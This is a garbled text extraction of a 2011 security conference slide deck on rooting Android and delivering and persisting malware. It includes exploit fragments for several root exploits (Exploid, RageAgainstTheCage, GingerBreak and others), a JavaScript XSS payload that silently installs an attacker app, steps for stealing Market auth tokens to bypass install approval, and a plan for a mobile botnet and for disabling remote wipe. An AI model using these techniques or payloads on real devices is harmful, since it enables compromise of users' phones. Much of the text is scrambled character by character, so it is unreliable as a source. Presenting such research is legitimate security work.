of 82
7/24/2019 bsides11-dontrootrobots
1/82
Slide # 1DON'T ROOT ROBOTS! - BSides Detroit 2011
7/24/2019 bsides11-dontrootrobots
2/82
Slide # 2DON'T ROOT ROBOTS! - BSides Detroit 2011
A TEAM JOCH Production
Jon Oberheide + ZachLanier=
TEAM JOCH
7/24/2019 bsides11-dontrootrobots
3/82
Slide # 3DON'T ROOT ROBOTS! - BSides Detroit 2011
DON'T DATE ROBOTS!
7/24/2019 bsides11-dontrootrobots
4/82
Slide # 4DON'T ROOT ROBOTS! - BSides Detroit 2011
Agenda
Overview
Escalation
Delivery
Persistence
7/24/2019 bsides11-dontrootrobots
5/82
Slide # DON'T ROOT ROBOTS! - BSides Detroit 2011
i A Hu"an#!
$hat'# in an Android%
7/24/2019 bsides11-dontrootrobots
6/82
DON'T ROOT ROBOTS! - BSides Detroit 2011
Android at a &ance
!ase "lator$% &'( core
% Lin)* 2,3* -ernel
.ative libraries
% libc/ 0eb-it/ etc
Dalvi- (% 'eisterbased (
% ')ns de* bytecode
&""lications% Develo"ed in ava
% ')n on Dalvi- (
% Lin)* "rocess 151
7/24/2019 bsides11-dontrootrobots
7/82DON'T ROOT ROBOTS! - BSides Detroit 2011
Per"i##ionBa#ed Mode
&""s e*"licitly re6)est"redeined "er$issions
E*a$"les5% 7ell)lar5 calls/ S(S/ ((S
% .et8or-/ !l)etooth/ 0i9i
% :ard8are5 vibrate/ bac-liht
% Location5 coarse/ ine%&"" data5 contacts/ calendars
7/24/2019 bsides11-dontrootrobots
8/82DON'T ROOT ROBOTS! - BSides Detroit 2011
A(( Sand)o*ing
;Sandbo*ed< by standard .>? )id@id% Aenerated )ni6)e "er a"" at install ti$e
:ihlevel "er$issions restricted by&ndroid r)nti$e ra$e8or-
7/24/2019 bsides11-dontrootrobots
9/82DON'T ROOT ROBOTS! - BSides Detroit 2011
A(( Di#tri)ution
&""lication sinin
% Selsined by develo"ers
&ndroid (ar-et% B2 sin)"/ anyone can ")blish
%&nony$o)s sin)" is "ossible
7/24/2019 bsides11-dontrootrobots
10/82Slide # 1CDON'T ROOT ROBOTS! - BSides Detroit 2011
Agenda
Overvie8
E#caation
Delivery
Persistence
7/24/2019 bsides11-dontrootrobots
11/82
Slide # 11DON'T ROOT ROBOTS! - BSides Detroit 2011
DON'T ROOT ROBOTS!
$h+ root +our Android%
7/24/2019 bsides11-dontrootrobots
12/82
Slide # 12DON'T ROOT ROBOTS! - BSides Detroit 2011
Android Jai)rea,#
ailbrea-s can be ;AOODnhe.a$e% Zi$"erLich
% Ainer!rea- -ET'S D./E .N!
7/24/2019 bsides11-dontrootrobots
14/82
Slide # 14DON'T ROOT ROBOTS! - BSides Detroit 2011
E*(oid Jai)rea,
E0P-O.D
7/24/2019 bsides11-dontrootrobots
15/82
Slide # 1DON'T ROOT ROBOTS! - BSides Detroit 2011
C/E12234456
Reduce7 reu#e7 rec+ce888e*(oit#!
0on 2CCI P8nie &8ard or best "rivescJ
7/24/2019 bsides11-dontrootrobots
16/82
Slide # 1,DON'T ROOT ROBOTS! - BSides Detroit 2011
Netin, in ASC..
+---------------------+ +---------------------+ | (3) application "A" | | (3) application "B" | +------+--------------+ +--------------+------+ | | \ / \ / | | +-------+--------------------------------+-------+ | : : | user-space=====+ : (5) kernel socket API : +================
| : : | kernel-space +--------+-------------------------------+-------+ | | +-----+-------------------------------+----+ | (1) Netlink subsystem | +---------------------+--------------------+ | +---------------------+--------------------+ | (2) Generic Netlink bus |
+--+--------------------------+-------+----+ | | | +-------+---------+ | | | (4) controller | / \ +-----------------+ / \ | | +------------------+--+ +--+------------------+ | (3) kernel user "X" | | (3) kernel user "Y" | +---------------------+ +---------------------+
7/24/2019 bsides11-dontrootrobots
17/82
Slide # 1DON'T ROOT ROBOTS! - BSides Detroit 2011
-et'# Pretend888
+---------------------+ +---------------------+ | (3) application "A" | | (3) application "B" | +------+--------------+ +--------------+------+ | | \ / \ / | | +-------+--------------------------------+-------+ | : : | user-space=====+ : (5) kernel socket API : +================
| : : | kernel-space +--------+-------------------------------+-------+ | | +-----+-------------------------------+----+ | (1) Netlink subsystem | +---------------------+--------------------+ | +---------------------+--------------------+ | (2) Generic Netlink bus |
+--+--------------------------+-------+----+ | | | +-------+---------+ | | | (4) controller | / \ +-----------------+ / \ | | +------------------+--+ +--+------------------+ | (3) kernel user "X" | | (3) kernel user "Y" | +---------------------+ +---------------------+
9DE/
OBJECT:9E/ENT
Hernel notiies )devo -obGect event vianetlin- interace
)dev "eror$s so$e"rivileed action
7/24/2019 bsides11-dontrootrobots
18/82
Slide # 1KDON'T ROOT ROBOTS! - BSides Detroit 2011
-ac, o; Source Chec,ing
+---------------------+ +---------------------+ | (3) application "A" | | (3) application "B" | +------+--------------+ +--------------+------+ | | \ / \ / | | +-------+--------------------------------+-------+ | : : | user-space=====+ : (5) kernel socket API : +================
| : : | kernel-space +--------+-------------------------------+-------+ | | +-----+-------------------------------+----+ | (1) Netlink subsystem | +---------------------+--------------------+ | +---------------------+--------------------+ | (2) Generic Netlink bus |
+--+--------------------------+-------+----+ | | | +-------+---------+ | | | (4) controller | / \ +-----------------+ / \ | | +------------------+--+ +--+------------------+ | (3) kernel user "X" | | (3) kernel user "Y" | +---------------------+ +---------------------+
9DE/
OBJECT:9E/ENT
Evil a"" sends )devan evil $essae vianetlin- interace
)dev "eror$s evil"rivileed action
E/.- APP
7/24/2019 bsides11-dontrootrobots
19/82
Slide # 1IDON'T ROOT ROBOTS! - BSides Detroit 2011
E*(oid Jai)rea,
&ndroid ;inherited< the )dev v)ln% ;init< dae$on enca"s)lated )dev )nctionality% Still 8as "resent years ater )dev "atch
mp = message;mp += sprintf(mp, "remove@/d") + 1;mp += sprintf(mp, "SUBSYSTEM=block") + 1;mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;mp += sprintf(mp, "TIMEOUT=10") + 1;mp += sprintf(mp, "ACTION=remove") + 1;mp += sprintf(mp, "REMOVE_CMD=/tmp/run") + 1;
(y non&ndroid )dev e*"loit G)st ran @t$"@r)n as root5
7/24/2019 bsides11-dontrootrobots
20/82
Slide # 2CDON'T ROOT ROBOTS! - BSides Detroit 2011
E*(oid Pa+oad
close(creat("loading", 0666));if ((ofd = creat("hotplug", 0644)) < 0)
die("[-] creat");if (write(ofd, path , strlen(path)) < 0)
die("[-] write");close(ofd);symlink("/proc/sys/kernel/hotplug", "data");snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c"
"FIRMWARE=../../..%s/hotplug%c",0, basedir, 0, 0, basedir, 0);
Stealths "ayload loo-ed li-e the ollo8in5
$hat'# ha((ening here%
< create# =oading> ;ie
< write# =hot(ug> ;ie
< #+"in,# =data>
< netin, "#g
< (ath to e*(oid )inar+
7/24/2019 bsides11-dontrootrobots
21/82
Slide # 21DON'T ROOT ROBOTS! - BSides Detroit 2011
9#e the Source7 -u,e!
void process_firmware_event(struct uevent *uevent){...
l = asprintf(&root, SYSFS_PREFIX"%s/", uevent->path);
l = asprintf(&loading, "%sloading", root); l = asprintf(&data, "%sdata", root); l = asprintf(&file1, FIRMWARE_DIR1"/%s", uevent->firmware);... loading_fd = open(loading, O_WRONLY);
data_fd = open(data, O_WRONLY);
fw_fd = open(file1, O_RDONLY);
... if(!load_firmware(fw_fd, loading_fd, data_fd))
9ro$ htt"5@@androidit-ernelor@F"="lator$@syste$@coreitMa=blobM=init@devicesc 5
^ /sys/../sqlite_stmt_journals/loading
^ /etc/firmware/../../sqlite_stmt_journals/hotplug
^ /sys/../sqlite_stmt_journals/data
http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.chttp://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c7/24/2019 bsides11-dontrootrobots
22/82
Slide # 22DON'T ROOT ROBOTS! - BSides Detroit 2011
9#e the Source7 -u,e!
int load_firmware(int fw_fd, int loading_fd, int data_fd){...
write(loading_fd, "1", 1); /* start transfer */
while (len_to_copy > 0) { nr = read(fw_fd, buf, sizeof(buf));... while (nr > 0) { nw = write(data_fd, buf + nw, nr);
...}
9ro$ htt"5@@androidit-ernelor@F"="lator$@syste$@coreitMa=blobM=init@devicesc 5
< read ;ro" =hot(ug>
< write to =data>
Netin, "e##age cau#e# the init dae"on to read the
content# o; =hot(ug> and write the" into =data>
http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.chttp://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c7/24/2019 bsides11-dontrootrobots
23/82
Slide # 23DON'T ROOT ROBOTS! - BSides Detroit 2011
BOOM! ROOT!
'e$e$ber5% ;hot"l)< contains "ath to e*"loid
% ;data< is sy$lin-ed to @"roc@sys@-ernel@hot"l)
So5% @"roc@sys@-ernel@hot"l) no8 contains the "ath
to the e*"loid binary
% Overrides the dea)lt hot"l) "ath >nvo-e hot"l)5
% E*"loid 8ill be r)n as rootJ
7/24/2019 bsides11-dontrootrobots
24/82
Slide # 24DON'T ROOT ROBOTS! - BSides Detroit 2011
RageAgain#tTheCage Jai)rea,
RA&EA&A.NSTTHECA&E
7/24/2019 bsides11-dontrootrobots
25/82
Slide # 2DON'T ROOT ROBOTS! - BSides Detroit 2011
?uic, Trivia
/* Code intended to run with elevated privileges */do_stuff_as_privileged();
/* Drop privileges to unprivileged user */setuid(uid);
/* Code intended to run with lower privileges */
do_stuff_as_unprivileged();
$hat'# wrong with the ;oowing code%
&ss)$in a )id@e)id=C "rocess dro""in "rivilees
7/24/2019 bsides11-dontrootrobots
26/82
Slide # 2,DON'T ROOT ROBOTS! - BSides Detroit 2011
Setuid ?uir,#
/* Drop privileges to unprivileged user */setuid(uid);
ERRORS EAGAINThe uid does not match the current
uid and uid brings process over itsRLIMIT_NPROCresource limit.
9ro$ set)idN2 $an "ae5
0ell/ theres really only one line o interest5
>ts tr)e/ set)idN can and 8ill ail
7/24/2019 bsides11-dontrootrobots
27/82
Slide # 2DON'T ROOT ROBOTS! - BSides Detroit 2011
-inu* Re#ource -i"it#
RLIMIT_NPROC The maximum number of processes (or, more precisely on Linux, threads) that can be
created for the real user ID of the calling process. Upon encountering this limit, fork(2)
fails with the error EAGAIN.
0hat is 'L>(>.P'O7F
> there are too $any "rocesses or the )id
8ere dro""in to/ set)idN 8ill ailJ
hereore/ "rivilees 8ill not be dro""edand 8ell contin)e e*ec)tion 8ith )id=CJ
7/24/2019 bsides11-dontrootrobots
28/82
Slide # 2KDON'T ROOT ROBOTS! - BSides Detroit 2011
E*(oiting #etuid@1 .##ue#
> 8e can artiicially inlate the n)$ber o"rocesses o8ned by the taret )id/ 8e can
hit )ids 'L>(>.P'O7 and orce set)idNto ail 8ith errno E&A&>.
:o"e)lly/ the binary r)nnin 8ith )id=C 8illthen "eror$ so$e )nsae o"eration that8e can inl)ence
7/24/2019 bsides11-dontrootrobots
29/82
Slide # 2IDON'T ROOT ROBOTS! - BSides Detroit 2011
Android De)ug Bridge
&D!5Android Debug Bridge (adb) is a versatile oand
line tool t"at lets #ou ouniate $it" an eulator
instane or onneted Android-%o$ered devie& t is alient-server %rogra t"at inludes t"ree o%onents
Q
A daeon $"i" runs as a ba*ground %roess on
ea" eulator or devie instane& A)ess 8hat &D! ails to do 8hen it calls
set)id to dro" "rivileesF
7/24/2019 bsides11-dontrootrobots
30/82
Slide # 3CDON'T ROOT ROBOTS! - BSides Detroit 2011
RageAgain#tTheCage E*(oit
&D! ails to chec- set)idN ret)rn val)e5
'ae&ainsthe7ae e*"loit5
% or-N )" to 'L>(>.P'O7 or ;shell< )ser% Hill adb/ or-N aain/ adb ails set)idN
% Ro)r adb shell is no8 a root shellJ
/* then switch user and group to "shell" */setgid(AID_SHELL);
setuid(AID_SHELL);
7/24/2019 bsides11-dontrootrobots
31/82
Slide # 31DON'T ROOT ROBOTS! - BSides Detroit 2011
iing.nTheNa"eO; Jai)rea,
.--.N&.NTHENAMEO
7/24/2019 bsides11-dontrootrobots
32/82
Slide # 32DON'T ROOT ROBOTS! - BSides Detroit 2011
Android'# a#h"e"
ash$e$
% 7)sto$ sh$e$ interace by Aoole5
T"e as"e subs#ste is a ne$ s"aredeor# alloator siilar to +OS, S. but
$it" di//erent be"avior and s%orting a si%ler
/ile-based A+&
7)sto$ code T ri"e or v)lnerabilitiesJ
7/24/2019 bsides11-dontrootrobots
33/82
Slide # 33DON'T ROOT ROBOTS! - BSides Detroit 2011
a#h"e" Pro(ert+ Ma((ing
ash$e$ $a"s in &ndroid syste$"ro"erties in to each address s"ace
.ot $$a"ed P'O0'>E than-)lly/that 8o)ld be bad/ 8o)ldnt itF
# cat /proc/178/maps...40000000-40008000 r-xs 00000000 00:07 187/dev/ashmem/system_properties (deleted)...
7/24/2019 bsides11-dontrootrobots
34/82
Slide # 34DON'T ROOT ROBOTS! - BSides Detroit 2011
Android Pro(ertie#
&ndroid "ro"erties5
rosec)re deter$ines 8hether &D! r)ns as
root or dro"s "rivs to &>DS:ELL )ser > 8e can chane it to C/ 8eve ot rootJ
$ getprop[ro.secure]: [1]
[ro.allow.mock.location]: [1][ro.debuggable]: [1]...
7/24/2019 bsides11-dontrootrobots
35/82
Slide # 3DON'T ROOT ROBOTS! - BSides Detroit 2011
iing.nTheNa"eO; E*(oit
)rns o)t ash$e$ 8ill let )s $"rotect the$a""in as P'O0'>E5
9li" the rosec)re "ro"erty to C5
S"a8n root adb shellJ
printf("[+] Found prop area @ %p\n", prop);
if (mprotect(prop, PA_SIZE, PROT_READ|PROT_WRITE) < 0) die("[-] mprotect");
if (strcmp(pi->name, "ro.secure") == 0) { strcpy(pi->value, "0");
7/24/2019 bsides11-dontrootrobots
36/82
Slide # 3,DON'T ROOT ROBOTS! - BSides Detroit 2011
i"(er-ich Jai)rea,
.MPER-.CH
7/24/2019 bsides11-dontrootrobots
37/82
Slide # 3DON'T ROOT ROBOTS! - BSides Detroit 2011
i"(er-ich Jai)rea,
&9ESS $HAT%
Sa"e a# Rage.nTheCage7e*ce(t ;or the +gote (roce##!
(issin ret)rn val)e chec- on set)idN2
&
7/24/2019 bsides11-dontrootrobots
38/82
Slide # 3KDON'T ROOT ROBOTS! - BSides Detroit 2011
&ingerBrea, Jai)rea,
&.N&ERBREA
&i B , J i) ,
7/24/2019 bsides11-dontrootrobots
39/82
Slide # 3IDON'T ROOT ROBOTS! - BSides Detroit 2011
&ingerBrea, Jai)rea,
&9ESS $HAT A&A.N%
Sa"e a# E*(oid7e*ce(t ;or the vod (roce##!
(issin so)rce chec- on netlin- $essae
&i B , / )iit
7/24/2019 bsides11-dontrootrobots
40/82
Slide # 4CDON'T ROOT ROBOTS! - BSides Detroit 2011
&ingerBrea, /unera)iit+
void DirectVolume::handlePartitionAdded(const char *devpath,NetlinkEvent *evt){
int major = atoi(evt->findParam("MAJOR")); int minor = atoi(evt->findParam("MINOR"));... int part_num; const char *tmp = evt->findParam("PARTN");... part_num = atoi(tmp);
... if (part_num > mDiskNumParts) { mDiskNumParts = part_num; }
mPartMinors[part_num -1] = minor;
S(ot the vun in vod'# Direct/ou"e8c((!
A )it $ it / )iit
7/24/2019 bsides11-dontrootrobots
41/82
Slide # 41DON'T ROOT ROBOTS! - BSides Detroit 2011
Ar)itrar+ $rite /unera)iit+
&rbitrary 8rite via neative inde*% S"oo netlin- $s 8ith $alicio)sly
crated P&'. and (>.O'n = snprintf(buf, sizeof(buf), "@/foo%cACTION=add%c" "SUBSYSTEM=block%c" "DEVPATH=%s%c" "MAJOR=179%cMINOR=%d%c" "DEVTYPE=harder%cPARTN=%d", 0, 0, 0, bsh,
0, 0, vold.system, 0, 0, -idx);
&i B , N0 B
7/24/2019 bsides11-dontrootrobots
42/82
Slide # 42DON'T ROOT ROBOTS! - BSides Detroit 2011
&ingerBrea, N0 B+(a##
!)t 8here@8hat to 8riteF
So$e &ndroid devices have .? stac-@hea"
% !)t lac- other hardenin $echansi$s A77s 'EL'O
% cc 0l/U/relro/U/no8
% (a"s AO as readonly > no 'EL'O5
% 7lobber AO entry to $odiy control lo8
&i B , E it
7/24/2019 bsides11-dontrootrobots
43/82
Slide # 43DON'T ROOT ROBOTS! - BSides Detroit 2011
&ingerBrea, E*(oit
.ot 6)ite so si$"le tho)h5% Discover AO/ syste$N/ etc addresses
% 7lobber AO or )nctions Natoi/ etc T syste$N
% 9)ncs called on attac-er controlled data5
% atoi=syste$ and t$"=;@data@local@t$"@boo$sh$"actF% Pretty catastro"hic
Java#cri(t 0SS(a+oad can trigger
the in#ta o; an+ a((
to +our (hone8
0SS .n#ta Pa+oad
7/24/2019 bsides11-dontrootrobots
52/82
Slide # 2DON'T ROOT ROBOTS! - BSides Detroit 2011
0SS .n#ta Pa+oad
/* silently install malicious app to victim phone */
$.post('/install', { id: 'com.attacker.maliciousapp', device: initProps['selectedDeviceId'], token: initProps['token'], xhr: '1' }, function(data) {});
>nstall "ayload5
9orces )sers bro8ser to re6)est install oco$attac-er$alicio)sa""
0SS Trigger Pa+oad
7/24/2019 bsides11-dontrootrobots
53/82
Slide # 3DON'T ROOT ROBOTS! - BSides Detroit 2011
0SS Trigger Pa+oad
/* append hidden iframe */$('body').append($(''));
/* continually trigger iframe src */function trigger() { $('#xss').attr('src', 'trigger://blah'); setTimeout('trigger()', 1000);}setTimeout('trigger()', 1000);
rier "ayload5
9orces )sers "hone to ;a)tor)n< the$alicio)s a"" ater install
$e) Mar,et -e##on#
7/24/2019 bsides11-dontrootrobots
54/82
Slide # 4DON'T ROOT ROBOTS! - BSides Detroit 2011
$e) Mar,et -e##on#
?SS '7E
% 'arely )sed in the sa$e sentenceJ
7rossdevice v)lnerabilities% Dont cross the strea$sat least 8itho)t a
si$"le conir$ation "ro$"tJ oO
9i*ed the ?SS b)t not the )nderlyin iss)e% )st 8ait a e8 $onths or the ne*t ?SS
Angr+ Bird# Attac,
7/24/2019 bsides11-dontrootrobots
55/82
Slide # DON'T ROOT ROBOTS! - BSides Detroit 2011
Angr+ Bird# Attac,
AN&R B.RDS ATTAC
Perceived A(( .n#ta Proce##
7/24/2019 bsides11-dontrootrobots
56/82
Slide # ,DON'T ROOT ROBOTS! - BSides Detroit 2011
Perceived A(( .n#ta Proce##
48 Brow#e 18 .n#ta 8 A((rove BOOM!
Actua A(( .n#ta Proce##
7/24/2019 bsides11-dontrootrobots
57/82
Slide # DON'T ROOT ROBOTS! - BSides Detroit 2011
Actua A(( .n#ta Proce##
1 ser clic-s install@a""rove
2 (ar-et a"" POSs install re6)est toAoole
3 (ar-et servers sinal 72D( servers
4 72D( servers ")sh do8n >.S&LL&SSE
Aal-Service receives >.S&LL&SSE andinvo-es vendin
, endin co$"onent etches &PH and installs
Mar,et .nteraction#
7/24/2019 bsides11-dontrootrobots
58/82
Slide # KDON'T ROOT ROBOTS! - BSides Detroit 2011
Mar,et .nteraction#
Aoole is a snea-y "andaJ% Ro) dont act)ally do8nload @ install the a""
thro)h the $ar-et a""lication
0hen yo) clic- install in $ar-et a""% Aoole servers ")sh an o)toband $essae
do8n to yo) via "ersistent data connection
% riers >.S&LL&SSE intent to start install
% >ntent handler etches &PH and installs
De* B+tecode RE
7/24/2019 bsides11-dontrootrobots
59/82
Slide # IDON'T ROOT ROBOTS! - BSides Detroit 2011
De* B+tecode RE
&Ta,Service Connection
7/24/2019 bsides11-dontrootrobots
60/82
Slide # ,CDON'T ROOT ROBOTS! - BSides Detroit 2011
&Ta,Service Connection
Persistent data connection% S"ea-s ?(PP
% Sa$e connection no8 )sed or
72D( ")sh service
Aa" in res"onsibility%
(ar-et a"" does a""oves "er$s% !)t Atal-Service triers install
% heres a disconnect here
Mar,et A(( ReFue#t#
7/24/2019 bsides11-dontrootrobots
61/82
Slide # ,1DON'T ROOT ROBOTS! - BSides Detroit 2011
Mar,et A(( ReFue#t#
0hat does the $ar-et a"" POS to the$ar-et serverF
7an 8e s"oo the sa$e re6)est and
trier an >.S&LL&SSE $essae ands)bse6)ent installF
Ba#eG Encoded Proto)u;
7/24/2019 bsides11-dontrootrobots
62/82
Slide # ,2DON'T ROOT ROBOTS! - BSides Detroit 2011
Ba#eG Encoded Proto)u;
Raw Proto)u; Decoded
7/24/2019 bsides11-dontrootrobots
63/82
Slide # ,3DON'T ROOT ROBOTS! - BSides Detroit 2011
Raw Proto)u; Decoded
RE'ed Proto)u; S(eci;ication
7/24/2019 bsides11-dontrootrobots
64/82
Slide # ,4DON'T ROOT ROBOTS! - BSides Detroit 2011
RE ed Proto)u; S(eci;ication
a""@asset >D
a)th to-en
install re6)est$essae
Ee"ent# o; an .n#ta ReFue#t
7/24/2019 bsides11-dontrootrobots
65/82
Slide # ,DON'T ROOT ROBOTS! - BSides Detroit 2011
Ee"ent# o; an .n#ta ReFue#t
0e have the or$at o the re6)est no8J
.eed to "o")late it 8ith5% Lots o $iscellaneo)s ields
%&"" >D5 taret a"" to be installed 7an be derived ro$ dissectin $ar-et re6)ests
%&)th to-en5 the hard "artF )rns o)t 8e can steal it ro$ &ndroids &cco)nt(anaerJ
B+(a##ing Per"i##ion# A((rova
7/24/2019 bsides11-dontrootrobots
66/82
Slide # ,,DON'T ROOT ROBOTS! - BSides Detroit 2011
B+(a##ing Per"i##ion# A((rova
Steal the ;android< service to-en )sed by $ar-etro$ the &cco)nt(anaer
7onstr)ct "rotob) re6)est to $ar-et serversor invo-in an a""lication installer
>.S&LL&SSE is ")shed and a"" installed
8itho)t any )ser "ro$"t @ "er$ission a""roval
Po7 dis)ised as an &nry !irds e*"ansion a""
Angr+ Bird# Bonu# -eve#
7/24/2019 bsides11-dontrootrobots
67/82
Slide # ,DON'T ROOT ROBOTS! - BSides Detroit 2011
Angr+ Bird# Bonu# -eve#
a,e To raud A((
7/24/2019 bsides11-dontrootrobots
68/82
Slide # ,KDON'T ROOT ROBOTS! - BSides Detroit 2011
a,e To raud A((
RootStra(
7/24/2019 bsides11-dontrootrobots
69/82
Slide # ,IDON'T ROOT ROBOTS! - BSides Detroit 2011
RootStra(
ROOTSTRAP
Android Native Code
7/24/2019 bsides11-dontrootrobots
70/82
Slide # CDON'T ROOT ROBOTS! - BSides Detroit 2011
Android Native Code
Dalvi- ( J= sandbo*% .ot li$ited to e*ec)tin de* bytecode
% 7an "o" o)t o the ( to e*ec)te native code
.ative code "ac-aed 8ithin &PHs%&ndroid sho)ld do so$e code sinin li-e iPhone
% !)t it doesnt/ so 8hy li$it e*ec)tion o native code tob)ildti$e "ac-aed $od)lesF
RootStra(
7/24/2019 bsides11-dontrootrobots
71/82
Slide # 1DON'T ROOT ROBOTS! - BSides Detroit 2011
RootStra(
:o8 to deliver "ayloads $ost eectivelyF
Enter/ 'ootStra"
% Silent r)nti$eetchin ande*ec)tion ore$ote &'(
"ayloads
Native ARM Code Deiver+
7/24/2019 bsides11-dontrootrobots
72/82
Slide # 2DON'T ROOT ROBOTS! - BSides Detroit 2011
Native ARM Code Deiver+
9etch inde* ile% Lists available e*"loits and $od)le na$es
Ran- do8n &'( $od)les% D)$"ed to &ndroid a"" "rivate storae
% e @data@data@orrootstra"@iles/ not @libs
Load via .> and e*ec)te each "ayload% Syste$loadN;@iles@root1so
7/24/2019 bsides11-dontrootrobots
73/82
Slide # 3DON'T ROOT ROBOTS! - BSides Detroit 2011
How to Buid a Mo)ie Botnet
!)ild so$e )n leitloo-in a$es @ a""s% >ncl)de 'ootStra" )nctionality
% Periodically "hone ho$e to chec- or ne8 "ayloads
&s soon as ne8 v)ln@Gailbrea- is ")blished/")sh do8n "ayload to 'ootStra"ed "hones% !eore "roviders ")sh o)t O& "atch
% rivial to 8in that race/ slo8 O& )"dates
'oot-it a b)nch o "honesJ
A $o; in /a"(ire'# Cothing%
7/24/2019 bsides11-dontrootrobots
74/82
Slide # 4DON'T ROOT ROBOTS! - BSides Detroit 2011
A $o; in /a"(ire # Cothing%
'ootStra" a"" is borin and not snea-y% .o one 8o)ld intentionally do8nload it
% .eed so$ethin leit loo-in to et a lareinstall base
:$$8hat to do/ 8hat to do
a,e Twiight Eci(#e A((
7/24/2019 bsides11-dontrootrobots
75/82
Slide # DON'T ROOT ROBOTS! - BSides Detroit 2011
a,e Twiight Eci(#e A((
And+ and Jai"e Don't -i,e .t I@
7/24/2019 bsides11-dontrootrobots
76/82
Slide # ,DON'T ROOT ROBOTS! - BSides Detroit 2011
And+ and Jai"e Don t -i,e .t I @
Still/ 2CC+ do8nloads
in )nder 24 ho)rs
0ith a leitloo-in
a""@a$e/ yo) co)ld
collect 6)ite an install
base or 'ootStra"
Agenda
7/24/2019 bsides11-dontrootrobots
77/82
Slide # DON'T ROOT ROBOTS! - BSides Detroit 2011
Agenda
Overvie8
Escalation Delivery
Per#i#tence
Per#i#tence
7/24/2019 bsides11-dontrootrobots
78/82
Slide # KDON'T ROOT ROBOTS! - BSides Detroit 2011
e # #te ce
Hand# o;; our root,it!
Sta+ing on the Device
7/24/2019 bsides11-dontrootrobots
79/82
Slide # IDON'T ROOT ROBOTS! - BSides Detroit 2011
+ g
Aoole 8ill 8i"e ;bad< a""s% (y 'ootStra" a""/ as a dryr)n
% DroidDrea$ $al8are/ or realU
!ad )ys 8ant to stay on the device% (aintain 7W7/ deliver ne8 "ayloads/ etc
Sur%risingl# enoug" 've #et to see an# Android
al$are %er/or an# %ost-rooting sel/-%rotetion&
REMO/E ASSET Patching
7/24/2019 bsides11-dontrootrobots
80/82
Slide # KCDON'T ROOT ROBOTS! - BSides Detroit 2011
: g
'E(OE&SSE%&llo8s Aoole to re$ote 8i"e a""s
% Easy to "atch o)t the de*code i yo)re root
endina"-% co$androidvendin
% 'e$ove&sset'eceiverclass% Patch in a C*CeCC @ ret)rnvoid instr)ction
at beinnin o on'eceiveN
7/24/2019 bsides11-dontrootrobots
81/82
?ue#tion#%
7/24/2019 bsides11-dontrootrobots
82/82
Jon O)erheide
XGonoberheide
GonXoberheideor
Duo Securit+